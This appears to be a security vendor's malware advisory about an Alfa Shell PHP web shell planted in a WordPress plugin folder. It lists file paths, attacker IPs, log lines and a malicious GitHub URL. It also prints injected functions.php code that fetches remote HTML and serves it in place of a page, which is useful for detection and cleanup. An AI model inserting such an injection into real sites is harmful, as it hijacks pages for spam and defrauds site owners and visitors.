If a website contains the file, most likely it was compromised, as this is a tool for attackers to exploit the entire server.
lock.php is a well-known PHP web shell called Alfa Shell, version 4.1. It’s one of the most feature-rich and widely-deployed shells in the wild, commonly dropped onto compromised WordPress sites.
MAGEFIX SecurityMalware cleanup & protection
Try our free site check.
A malware analyst will provide a security report for your website.
Key notes:
- Attackers often regain access using backdoors, so a thorough cleanup is recommended.
- SEO spam can affect and corrupt Google search results.
- WordPress admin access is often exploited, so consider resetting user passwords.
- functions.php file could be compromised with injected PHP code that hijacks page rendering for a specific URL condition.
add_action('template_redirect', function() {
if (is_page('all-events')) {
$html = file_get_contents('https://raw.githubusercontent.com/harleytou121-ctrl/lp/refs/heads/main/sgladang.txt');
if ($html !== false) {
echo $html;
} else {
echo "Gagal memuat halaman.";
}
exit;
}
});
File location: /wp-content/plugins/pwnd/lock.php
Other files:
/wp-content/plugins/pwnd/ahay.php
/wp-content/plugins/pwnd/pwnd.php
Malicious URLs:
https://raw.githubusercontent.com/harleytou121-ctrl/lp/refs/heads/main/sgladang.txt
Type: PHP web shell
Identification: Alfa Shell v4.1 (XXVI)
Gist: https://gist.github.com/magefix/fa37b8b14393b4f13a9c62558f291395
Sample logs:
[24/May/2026:04:22:28 -0400] “POST /wp-content/plugins/pwnd/lock.php HTTP/2.0” 200 11944 “/wp-content/plugins/pwnd/lock.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36”
[23/May/2026:14:55:03 -0400] “POST /wp-content/plugins/pwnd/jancox/alfacgiapi/perl.alfa HTTP/2.0” 200 28 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)”
Malicious IPs involved in this attack: 194.233.78.2, 152.42.226.61, 182.8.66.218.